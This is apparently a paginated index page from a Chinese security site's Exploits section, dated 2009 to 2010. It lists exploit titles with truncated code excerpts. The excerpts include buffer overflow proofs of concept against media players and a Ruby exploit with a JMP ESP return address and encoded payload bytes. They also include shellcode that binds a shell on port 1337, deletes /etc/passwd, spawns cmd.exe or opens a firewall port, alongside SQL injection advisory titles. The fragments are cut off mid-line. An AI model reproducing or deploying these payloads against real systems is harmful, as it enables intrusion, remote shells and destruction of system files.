首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Pre News Manager (nid) Remote SQL Injection Vulnerability
  日期:2010-01-04 10:34:22 点击:33 评论:0
Pre ADS Portal (cid) Remote SQL Injection Vulnerability
  日期:2010-01-04 10:34:21 点击:28 评论:0
Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
  日期:2010-01-04 10:34:21 点击:20 评论:0
Freewebscript'z Games (Auth Bypass) SQL Injection Vulnerability
  日期:2010-01-04 10:34:20 点击:27 评论:0
Opera 10.10 Status Bar Obfuscation
  日期:2010-01-04 10:34:19 点击:31 评论:0
Dren's PHP Uploader Remote File Upload Vulnerability
  日期:2010-01-04 10:34:15 点击:59 评论:0
Sunbyte e-Flower SQL Injection Vulneralbility
  日期:2010-01-04 10:34:14 点击:32 评论:0
win32/xp sp2 (En + Ar) cmd.exe 23 bytes
  日期:2010-01-04 10:34:13 点击:47 评论:0
Joomla Component com_calendario Blind SQL injection Vulnerability
  日期:2010-01-04 10:34:12 点击:24 评论:0
M.J.M. Quick Player v1.2 Stack BOF
  日期:2010-01-04 10:34:11 点击:95 评论:0
ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
  日期:2009-12-26 13:08:20 点击:76 评论:0
import sys print print ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit print By: Encrypt3d.M!nd print http://m1nd3d.wordpress.com/ print For Details visit my blog print try: header = ( x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22
JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC
  日期:2009-12-26 13:07:37 点击:29 评论:0
#!/user/bin/perl # Author: [D3V!L FUCKER] # Version: [jetAudio v 7.5.5.25 Basic] # Tested on: [windows vista sp0] # Code : my $file= crash.asx; my $boom= http://.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x 5000; open($
jetAudio v 8.0.0.0 Basic Local Crash PoC
  日期:2009-12-26 13:06:45 点击:23 评论:0
#!/user/bin/perl # Exploit Title: [Local Crash Poc] # Date: [Fri/Dec/25/2009] # Author: [D3V!L FUCKER] # Software Link: [http://www.jetaudio.com] # Version: [jetAudio v 8.0.0.0 Basic] # Tested on: [windows vista sp0] # Code : my $file= crash.asx; my
linux/x86 unlink(/etc/passwd) & exit() 35 bytes
  日期:2009-12-25 13:54:08 点击:39 评论:0
# Title: linux/x86 unlink(/etc/passwd) exit() 35 bytes # Date: 2009-12-24 # Author: sandman, n4mdn4s [4T] gmail [D0T] com # Tested on: linux/Fedora 12 # Code : /* unlink_passwd.c Platform: linux/x86 Size: 35 bytes Author: $andman */ #include string.
CastRipper (.M3U) Stack BOF WinXP SP2
  日期:2009-12-25 13:52:04 点击:31 评论:0
//Exploit Title: CastRipper (.M3U) Stack BOF WinXP SP2 - C // Date: 25/12/2009 // Author: bibi-info // Version: 2.50.70 // Tested on: Windows Xp sp2 // greetz : His0k4 All friends muslims HaCkers(dz) #includestdio.h #includestring.h #includestdlib.h
Exploit Easy RM to MP3 2.7.3.700 - Ruby
  日期:2009-12-25 13:51:32 点击:44 评论:0
#!/usr/bin/ruby breakit = x41 * 26109 jump = x3axf2xaax01 padit = x90 * 25 #01AAF23A FFE4 JMP ESP #MSRMCcodec02.dll finishhim = xddxc5xd9x74x24xf4x58xbfx27x98xb6xfcx31xc9 + xb1x32x31x78x17x83xe8xfcx03x5fx8bx54x09x63
win32/xp sp2 calc.exe 45 bytes
  日期:2009-12-25 13:50:37 点击:36 评论:0
/* win32/xp sp2 calc.exe 45 bytes Author : Mountassif Moad Big Thnx : To my brother iuoisn His0ka Jadi ...... Mr.Safa7 Changed by : Stack First shellcode : http://www.milw0rm.com/exploits/7971 Description : It is 45 Bytes Shellcode which Execute cal
freebsd/x86 portbind shellcode 167 bytes
  日期:2009-12-25 13:50:00 点击:52 评论:0
/*- * Copyright (c) 2009, Sofian Brabez sbz@6dev.net * * freebsd-x86-portbind.c - FreeBSD x86 portbind a shell (/bin/sh) on 1337 (x05x39) 167 bytes */ const char shellcode[] = x6ax00 // push $0x0 x6ax01 // push $0x1 x6ax02 // push $0x2 x50
Picpuz <=2.1.1 Buffer Overflow DoS/PoC
  日期:2009-12-25 13:49:24 点击:30 评论:0
# Exploit Title: Picpuz Buffer Overflow DoS/PoC =2.1.1 # Date: 24 Dec, 2009 # Author: sandman, n4mdn4s [4T] gmail [D0T] com # Software Link: http://kornelix.squarespace.com/picpuz/http://kornelix.squarespace.com/printoxx/ , http://kornelix.squarespa
Win32 XP SP3 addFirewallRule
  日期:2009-12-25 13:48:12 点击:99 评论:0
; Author: sinn3r ; Tested on Windows XP SP3 ; Description: ; This shellcode will create a XP firewall rule to allow TCP traffic on port 445. ; Make sure ADVAPI32.dll is loaded. [BITS 32] global _start _start: ;for the handle xor edx, edx mov edi, es
共637页/12733条记录 首页 上一页 [410] [411] [412] 413 [414] [415] [416] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved